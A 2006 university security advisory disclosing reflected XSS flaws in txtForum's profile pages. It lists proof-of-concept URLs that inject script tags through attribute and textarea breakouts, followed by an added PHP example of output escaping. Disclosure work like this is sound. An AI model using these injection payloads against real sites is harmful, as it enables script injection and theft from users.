Securityvulns SECURITYVULNS:DOC:11764
Mar 09, 2006 - 12:00 a.m.

txtForum: Multiple XSS Vulnerabilities


===========================================================
txtForum: Multiple XSS Vulnerabilities

Technical University of Vienna Security Advisory
TUVSA-0603-003, March 9, 2006

Affected applications

txtForum (http://sourceforge.net/projects/txtforum1)

Versions 1.0.4-dev and prior.

Description

There are multiple cross-site scripting (XSS) vulnerabilities which can be verified by using the following
exploits (the user needs to be logged in). They are roughly sorted by entry points (i.e., the names of the
files that have to be navigated). The vulnerabilities were discovered under the assumption that
register_globals is on, and that magic_quotes_gpc is off.

index.php

new_topic.php

profile.php

  • skins/txtforum/viewprofile.tpl, line 11

http://localhost/txtforum104/profile.php?mode=viewprofile&nick=admin&r_num=<script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 18

http://localhost/txtforum104/profile.php?mode=editprofile&r_family_name="><script>alert('xss_string')</script>

http://localhost/txtforum104/profile.php?mode=editprofile&r_homepage="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 39

http://localhost/txtforum104/profile.php?mode=editprofile&r_interests="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 43

http://localhost/txtforum104/profile.php?mode=editprofile&r_about="</textarea><script>alert('xss_string')</script>

http://localhost/txtforum104/profile.php?mode=editprofile&signature_selected1="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 69
    $signature_selected0: if $show_sig == 1

http://localhost/txtforum104/profile.php?mode=editprofile&signature_selected0="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 73
    $smile_selected1: if $show_smile == 0

http://localhost/txtforum104/profile.php?mode=editprofile&smile_selected1="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 73
    $smile_selected0: if $show_smile == 1

http://localhost/txtforum104/profile.php?mode=editprofile&smile_selected0="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 78

http://localhost/txtforum104/profile.php?mode=editprofile&ubb_selected1="><script>alert('xss_string')</script>

  • skins/txtforum/editprofile.tpl, line 78

http://localhost/txtforum104/profile.php?mode=editprofile&ubb_selected0="><script>alert('xss_string')</script>

reply.php

view_topic.php

Solution

There is no solution to these issues yet.
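
An added example, not txtForum's code and not part of the advisory: HTML-encoding values at the point of template substitution, plus building template variables from an initialised allow-list, which together address the attribute and textarea breakouts listed above under the register_globals precondition. The template, collect_fields() and render() are hypothetical stand-ins; only the parameter names come from the advisory's URLs.

```php
<?php
// Added example; TEMPLATE, collect_fields() and render() are hypothetical stand-ins,
// not txtForum code. Constructed template: one attribute and one <textarea> context.
const TEMPLATE = <<<'TPL'
<input type="text" name="r_homepage" value="{r_homepage}">
<textarea name="r_about">{r_about}</textarea>
TPL;

// Parameters this form accepts (names taken from the advisory's URLs).
const PROFILE_FIELDS = ['r_homepage', 'r_about'];

// Build template variables from an allow-list and initialise each one, so a
// request parameter cannot define a variable the script never set
// (the register_globals precondition).
function collect_fields(array $request): array
{
    $vars = [];
    foreach (PROFILE_FIELDS as $name) {
        $value = $request[$name] ?? '';
        $vars[$name] = is_string($value) ? $value : '';
    }
    return $vars;
}

// Substitute {name} placeholders. strtr() does not rescan replaced text, so a
// value containing "{r_about}" is not expanded a second time.
function render(string $template, array $vars, bool $escape): string
{
    $pairs = [];
    foreach ($vars as $name => $value) {
        $pairs['{' . $name . '}'] = $escape
            ? htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
            : $value;
    }
    return strtr($template, $pairs);
}

// Constructed request modelled on the advisory's URLs.
$request = [
    'r_homepage'    => '"><script>alert(\'xss_string\')</script>',
    'r_about'       => '"</textarea><script>alert(\'xss_string\')</script>',
    'ubb_selected1' => '"><script>alert(\'xss_string\')</script>', // not on the allow-list, dropped
];

$vars = collect_fields($request);
echo "--- unescaped (the behaviour the advisory reports) ---\n", render(TEMPLATE, $vars, false), "\n";
echo "--- escaped with htmlspecialchars ---\n", render(TEMPLATE, $vars, true), "\n";
```

In the escaped output the quotes and angle brackets arrive as &quot;, &lt; and &gt;, so each value stays inside its attribute or textarea instead of closing it.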

Timeline:

February 23, 2006:
Vulnerabilities indicated via confy at users dot sourceforge dot net.
Provided detailed report of the vulnerabilities after the author's response.
No fixes are planned.

March 9, 2006:
Advisory submission.

References

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-003.txt

Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at